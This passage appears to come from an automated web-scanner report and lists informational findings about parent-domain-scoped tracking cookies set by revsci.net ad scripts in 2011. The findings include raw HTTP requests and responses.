Date: Thu, 12 May 2011 11:40:34 GMT
Content-Length: 1389

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','H07707_10872','D08734_72078','H07707_10950','H07707_10954','H07707_10987','
...[SNIP]...

13.72. http://pix04.revsci.net/H07707/b3/0/3/0806180/912026619.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/912026619.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/912026619.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; rsiPus_UVQe="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"; rsi_us_1000000="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"; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; 
rsi_segs_1000000=pUPF4k+huAIMDjaxq2F29zEFqICTC+braGYRkX2Il9r5vw/ZUticb4lLatz2X2BRF3fuzSPpZHOhG8XBQJfzC6mHn5XL+5kMRn9Ej7OPPmzGcTLoQGAD4+mlCyw1VhsIgll0dVU7YgbLvf8jP1IAILKHv23plY3OGVUE6uU/k+/C+AHqJ6wZiw8k46VH4BT+8uwHZkdQtE8myAf7GVM69Spx0dJcewAfqbKmBErgZkMdZIO2YF8wnql8uSbs9XQw0uX3nKfQiSxKkHxJ04tuIVx23LkAyHsHMOF1n1T3fhVDshqIz11T1HIDcLHifRzjDbE6zPbM9zhvCtMVF4HZq8C6baoCcmA1q7I95TBWbtuLtQPHaeCYXIN6Q7txYlaQjwhiDvS4EBmELnR00viV9oQ444/ReZVLMRAV+4PZ3cYF3Nutp5PB9qngd0j+C+BltI5/cFF9zNKulRKud0IqiVqx2Vp9Wd74f1lqgKTGmwunkCcqQ3ptnvhDtC3C9OTmwCwSBNoPv9CrVHez8Ov6JRj+LzZ7dC5oX4G0cCDrWBtS/E0aWeJ6tQsgbLCR9NRAqyp75UFEhmQv5LsJQzZJeJotrMQAPO7n2Z52+HG6V4oh023SjwmizJg93D/Su6XKvycukTb85FlHDTu8ZAwVinPuFgg3ptnufQf4xFMRCoYkuxN7/tlspKuDX9FDyNd7G7HzZXDNyghGWNaDjy8ySqQktLXsLK5jQSAqnD4NoVOUsYG/YNBg5q6NYeu27UcHj350kKnxqk+PNXXtn+43MR2Z4gbWfXY=; rtc_eanp=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_eanp=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4k+huXIQJ/AtY6gq+ml3T51epqLBQmL8IGbY2gQ4O3XYKvnesHJskvAjloepK631i+WEhWmrGkG9POozi7inp/3S9t0/IkxBMjdPeK2r1xOnBR+A8KgmFzpR3pMg5V0STXRc5h/sA2NQ8SJlLg63pEKsg0I5wRad6dbI4VuGWq0qyRY6oFRDcRF2ywDPp/l2ZM/I/17S1FdjMhMyzTpwiyFgMBvjzji/YDIpZH9+iRia02zqup5Uc4RB7fdpzSNwFedZ7rF5pmLypIrhS6jTxXdihxtKUvnVp3q4CZDvvMwKRSQUBIW8aKH6yqDjLLFCxPSykE7ev85UXsanukFhZ9jYJjEs313/TmtNJZjZKdkEwlKP+EpScAuabJwc2MVWU5pKqCBEiB/oMmqVrjImbeGElhPS91RP79kBRGAMI3fkhrHTOrUB9Nj+DoZKH4lbg3Y3J9fn8ovUmELM6+fTLDZn64dD6QhCAEzHeyhtNq/gwTK3++V4LRJN+nSAfcUw3lASsUZNnfJXTu8Q6bEhNzGSJQRi7/mcA+9ehrTH4KDTZbkJv7PT4yxIEMkCSgxLn6HSWeEolJQXExDVPWrP/cJ3hVepclllkb9wBj0AY1yZEwqutB2h4qxbtUMBqUHh6OSHAx9XJ2YkwMZHL/CCmBi2npcpOJ+5/TUDcglD1Y7oRv43ayXSghpU5rlQGkOeKu+yDGQAXXWVB4yBSqHOppm9zCE0PdS2yri1Rj97MbjhcH+2CxSiFDOCK/fCv/8tlGv96HYrlNfrIVhi5C6uRanp26QbkxI=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:15:55 GMT; Path=/
Set-Cookie: rtc_1ITi=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:15:55 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:15:54 GMT
Content-Length: 1089

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','D08734_72078','H07707_11017','H07707_11018','H07707_11028','H07707_11029','
...[SNIP]...

13.73. http://pix04.revsci.net/H07707/b3/0/3/0806180/949356899.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/949356899.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/949356899.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F06%252Fpalantir-valued-at-2-5-billion-or-more%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_REF%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252Fcategory%252Fmain-topics%252Fventure-capital%252F%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/06/palantir-valued-at-2-5-billion-or-more/
Cookie: NETID01=529777297210b0ea0bebf89fb75e37bd; udm_0=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; NETSEGS_H07707=d303c7ec11fd6a67&H07707&0&4df0add0&0&&4dca5d68&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; rsi_segs_1000000=pUPFOEPB7nMME594u+yjy0mav02iTsILcFItXRgoUTnlu1I0fvTx4Uzo/UWd5q+nTGoaNabDNSBKewcX6S7TBaIk6jd0+MBxvnAK9JboqoHpyEHF6wY/rKVe6EvTibweFOyKXr44rf06GLp3ZYgcvJ9ta/eFouLHU1W2bIozA/yq0E4w9CipCXek7DYBMQmdgvtLtf1geEgQccYWFr/z3xFYnvfSb3B3EUgPFJE5QVeopqyarGbY9Q==; rtc_GomL=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+E3r/9Dz2ruFLBtozaNrNCnxTv/CPBK4vxuKCe62VWohhBnMq1x/q0J22fzirjvhsYDeU2ou1Z4c7QpH/iIvZSk4jupAadTP3jJwOGhjpBlL0D/pb7eB9//K6gCqUY7F9avCH3SeUbAKZ8SaMucKXkSP0/UCmQq5H3prJ3dI4SCV2jsz357yIBJ1Wmb9VWkVixIXqd2sv4V4HAIcSCMcLipNC98B0t/No+oQiekPIcQ2jiRXxTdKUdmHxepDyCKFkkH2RhtOjE3aHseBOExJGngyl45Qk65yXrEpCF5Z/4S

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_GomL=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPNOE/FLnIQlrWdI00WdC2M5e+iH53YApI1XQ1VhIIo+uLeylJ24IzIDUVJoi+vnOqW9W/ZJZlixYxplxRO0W1JvkWpOEh6HITQG7wwtuWBy03DV2z/vqwD6stqsWyVtod2+y613Cs++rbRUfxEWWduyC6rDKAMyfYjERD/tzztSnr+CAtqaB92apUcZdvwPRCFqDZWn9No0zlL4k/buv/yOKhRX9tiffPrBsrIQ/ZRWwIlm22f8I7/9F5nFFM=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:28:19 GMT; Path=/
Set-Cookie: rtc_66oE=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+Err//DyFLu1LNxozaNrNCnxTv/CPBK4vwUC37I+Pw2DxDH9eVMUC9zB1mGK9JGee2kZ/rkxh9ZhsvGXmyp1GIOejNCcp29JzcATN8GDRgxtWQLVIrfqXjLYkKxH2Wkot1CcCcHEV+imu9mtVtV+fEsoPqb8Sx0EexVQw7FtCen+/ihLI/zuRtzoISDJn1i335fn+91HWdFyleqRqt2FFYHQRSR0n0huHL1bBQL7IuGA/Tq/HBv4FOro1WSc6yqw+2xjgQcQAAMVLamZ29iRGSHkD6u/g3+COdPKCC+G/59; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:28:19 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:28:19 GMT
Content-Length: 1119

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70010','D08734_70105','H07707_10872','H07707_10950','H07707_10954','H07707_10987','H07707_11017','H07707_11018','H07707_10678','
...[SNIP]...

13.74. http://pix04.revsci.net/H07707/b3/0/3/0806180/955065746.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/955065746.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/955065746.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F03%252Fprivate-equity-titans-finds-common-ground%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; rsiPus_qbvO="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"; rsi_us_1000000="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"; rtc_7N2M=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; 
NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_7N2M=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:06 GMT; Path=/
Set-Cookie: rtc_u0Bh=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:06 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:40:06 GMT
Content-Length: 1269

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','H07707_10872','D08734_72078','H07707_10950','H07707_10954','H07707_10987','
...[SNIP]...

13.75. http://pix04.revsci.net/J07717/b3/0/3/1003161/451564742.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J07717/b3/0/3/1003161/451564742.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J07717/b3/0/3/1003161/451564742.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.ft.com%252Findepth%252Fprivateequity%253FFTSectionCode%253D29dep%2526FTPageCode%253D29invbnk%2526FTP%253Dnull%2526FTR%253Dnull%2526FTI%253Dnull%2526FTC%253DUSA%2526FTCS%253Dnull%2526SubsLevel%253Danon%2526dfp_site%253Dftcom.5887.ftfm%2526dfp_zone%253Dprivate-equity%2526_rsiL%253D0%26DM_EOM%3D1&C=J07717 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4def57e5&0&&4dc8e6f8&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; 
rsi_segs_1000000=pUPF4z+huXIMJ/C1v6FY5BBd22rMpqLhiql/k32IlwMqsneLA7NlzsN5SuHyX2BRF5d65SaNq4yWbBkXQPF7ywJCkw+8fee+Ci1ww4TAIgmBv1Im4IlAyckkFDdZMtEpXiKykk7RoRoFR3oIbR9oO36G6jQquAAjRV25uQHpxKsSbL+Xbpak7/UAb4VY2+Doq58gE6rVzqShFUnu/GeSoBK3FzAQJ4tm6F6+kEV9xIBYDOlLycg+EHCW9SoOK0Da5RrJESR/YCuGWG0X4jEmEemu2r3fG81Kl+H2tkU/7Fupph24Qe2xvtnIX92P2kupq9TJAmvsFIdb6VChs3aYXPBBsKv9JceLT0rXL3r3JqW97t2CNejZJFPqnREALlJkZPimruVQj4CdDasyqHe4qRakKVsk/mA1tXedBz2im5lPQYJh8Iw2kAir007vHlWYJltd9+zB+IogciCvrgYiaiylWplquvfN/YhlZAVyekhcf0/4m3lfxetxVytKCNGRB1eKSptqXsDkBKyzcaJYzYt7E7aUD3ZKN1AAkIco2Hm5fl2ZfyqiP577826hhEMg3Od9PIFhqTbxzd/469rFly/bsvXdR/PZITutLSC2TfN4hB7XY8M6NPQgWWBNbZf/Yl/JQEuTHXfPyCZ0Bp176rqcZUbj0ScrxUyg88l6UeTGPFLBj6e4KLW0doQpigZdTkkduROK9j474Wdxfua0yYnzs8X0b04W7javQJ7WOaeFm6FL; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; rtc_d44E=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; rsiPus_Q2bN="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"; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_d44E=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4k+huHIQJvAtY6gquhqs9vksg7ZjGgbPT28I6QQ4O3XYuv3lSTtqNncA2iFgL+J8wQfFRGQkQ2U54M8TCv5T35XD+5ksRl9Uj7OPMmjOFbBgwT0BsKikEDJN/pMm5X0yDXRc1h/0I2NQ8eJlLg63pEKsg0I5wRadNzLTPMV2MpQRwwmT/QbrfyjFZmgC89KD+nUpvWSdQ0wLW6bYmJZ7cmDDJEbgHGkLxfgiXJ68tEV73gfcwOU6lk0j8m4wERf4UpHaqSxIrHw3GVEmGaBl/7kAyGM1sPFVj2vGfhXDoDoLz3wTlA7PsyDlPerjLLFCRBHNjzixQIoOMVs6a8C6bS4Cg++CzRol5QBabiMZ8IY15O/+l0G0QUQJ6AnsDsZlcVhxyiGUl2J3ysiVilfqOCo2vwsU8C4i/nixMJHpiJB5gCkGjQB6TBofo3xP646PFvsX8kOpyqgsbT3BiIEL6nrQrMIgeqbTfYkLHEZWl72/x+3BYjdULstkAApVgtTwD0m3SiY2Ib4pf3quhFEC20316c1d+ZzYPyyr2BuSz00aW+J69QcgLICR9NS4BJvaPZRs/OzE8MKALlcm0B3Mbc57N2Ws6jWqp7eE9Qo7M4FeanFmoG7z2hLMGUHFTkDWZR5yLMMKaqxxIvHT192MSXeBaiBx80slyc8gSqxX7rKbOJzYHGFV4i+URd16G7